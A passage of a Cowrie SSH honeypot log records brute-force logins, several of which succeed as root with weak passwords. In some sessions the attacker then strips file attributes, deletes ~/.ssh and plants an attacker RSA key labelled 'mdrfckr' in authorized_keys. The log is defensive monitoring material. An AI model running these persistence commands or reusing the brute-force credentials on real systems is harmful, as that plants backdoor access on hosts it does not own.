{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:51:47.251811Z","src_ip":"212.227.235.229","session":"80d181fe8571"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52784,"dst_ip":"1.2.3.4","dst_port":22,"session":"8420f620cb23","protocol":"ssh","message":"New connection: 212.227.235.229:52784 (1.2.3.4:22) [session: 8420f620cb23]","sensor":"my-vps","timestamp":"2025-08-26T12:51:50.603992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:51:50.604698Z","src_ip":"212.227.235.229","session":"8420f620cb23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44380,"dst_ip":"1.2.3.4","dst_port":22,"session":"00e95c8088b6","protocol":"ssh","message":"New connection: 212.227.235.229:44380 (1.2.3.4:22) [session: 00e95c8088b6]","sensor":"my-vps","timestamp":"2025-08-26T12:52:00.079568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:52:00.081176Z","src_ip":"212.227.235.229","session":"00e95c8088b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:52:00.353136Z","src_ip":"212.227.235.229","session":"00e95c8088b6"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd@123","message":"login attempt [root/P@55w0rd@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:52:01.325711Z","src_ip":"212.227.235.229","session":"00e95c8088b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:52:01.784836Z","src_ip":"212.227.235.229","session":"00e95c8088b6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:52:01.785626Z","src_ip":"212.227.235.229","session":"00e95c8088b6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:52:01.786832Z","src_ip":"212.227.235.229","session":"00e95c8088b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:52:01.987942Z","src_ip":"212.227.235.229","session":"00e95c8088b6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:52:02.460532Z","src_ip":"212.227.235.229","session":"00e95c8088b6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:52:02.461326Z","src_ip":"212.227.235.229","session":"00e95c8088b6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:52:02.663677Z","src_ip":"212.227.235.229","session":"00e95c8088b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:52:02.664534Z","src_ip":"212.227.235.229","session":"00e95c8088b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46323,"dst_ip":"1.2.3.4","dst_port":22,"session":"fae30f4daeb9","protocol":"ssh","message":"New connection: 212.227.235.229:46323 (1.2.3.4:22) [session: fae30f4daeb9]","sensor":"my-vps","timestamp":"2025-08-26T12:52:02.881567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:52:02.883136Z","src_ip":"212.227.235.229","session":"fae30f4daeb9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:52:03.117835Z","src_ip":"212.227.235.229","session":"fae30f4daeb9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:52:03.989703Z","src_ip":"212.227.235.229","session":"fae30f4daeb9"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:52:05.200595Z","src_ip":"212.227.235.229","session":"fae30f4daeb9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47894,"dst_ip":"1.2.3.4","dst_port":22,"session":"93e5b1bd0888","protocol":"ssh","message":"New connection: 212.227.235.229:47894 (1.2.3.4:22) [session: 93e5b1bd0888]","sensor":"my-vps","timestamp":"2025-08-26T12:52:05.401955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:52:05.402768Z","src_ip":"212.227.235.229","session":"93e5b1bd0888"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:52:05.621361Z","src_ip":"212.227.235.229","session":"93e5b1bd0888"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:52:07.087463Z","src_ip":"212.227.235.229","session":"93e5b1bd0888"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:52:07.301260Z","src_ip":"212.227.235.229","session":"93e5b1bd0888"}
{"eventid":"cowrie.session.closed","duration":"7.2","message":"Connection lost after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:52:07.308393Z","src_ip":"212.227.235.229","session":"00e95c8088b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:52:19.512849Z","src_ip":"212.227.235.229","session":"8420f620cb23"}
{"eventid":"cowrie.session.closed","duration":"28.9","message":"Connection lost after 28.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:52:19.514697Z","src_ip":"212.227.235.229","session":"8420f620cb23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58092,"dst_ip":"1.2.3.4","dst_port":22,"session":"7faaee94a478","protocol":"ssh","message":"New connection: 212.227.235.229:58092 (1.2.3.4:22) [session: 7faaee94a478]","sensor":"my-vps","timestamp":"2025-08-26T12:52:56.633375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:52:56.634040Z","src_ip":"212.227.235.229","session":"7faaee94a478"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:52:56.882815Z","src_ip":"212.227.235.229","session":"7faaee94a478"}
{"eventid":"cowrie.login.failed","username":"ethereum","password":"ethereum123","message":"login attempt [ethereum/ethereum123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:52:57.917327Z","src_ip":"212.227.235.229","session":"7faaee94a478"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:52:59.171051Z","src_ip":"212.227.235.229","session":"7faaee94a478"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56862,"dst_ip":"1.2.3.4","dst_port":22,"session":"06e2b31bc397","protocol":"ssh","message":"New connection: 212.227.235.229:56862 (1.2.3.4:22) [session: 06e2b31bc397]","sensor":"my-vps","timestamp":"2025-08-26T12:53:13.663334Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:53:13.664344Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:53:13.919735Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa222222","message":"login attempt [root/Aa222222] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:53:14.983001Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:15.515275Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:53:15.516026Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:53:15.516747Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:15.772668Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:53:16.902063Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T12:53:16.902850Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56868,"dst_ip":"1.2.3.4","dst_port":22,"session":"df5ff5e5de08","protocol":"ssh","message":"New connection: 212.227.235.229:56868 (1.2.3.4:22) [session: df5ff5e5de08]","sensor":"my-vps","timestamp":"2025-08-26T12:53:17.398624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:53:17.399652Z","src_ip":"212.227.235.229","session":"df5ff5e5de08"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:53:17.647437Z","src_ip":"212.227.235.229","session":"df5ff5e5de08"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T12:53:17.676297Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:53:17.678092Z","src_ip":"212.227.235.229","session":"06e2b31bc397"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42330,"dst_ip":"1.2.3.4","dst_port":22,"session":"7383544b6955","protocol":"ssh","message":"New connection: 212.227.125.160:42330 (1.2.3.4:22) [session: 7383544b6955]","sensor":"my-vps","timestamp":"2025-08-26T12:53:18.308374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:53:18.309182Z","src_ip":"212.227.125.160","session":"7383544b6955"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group1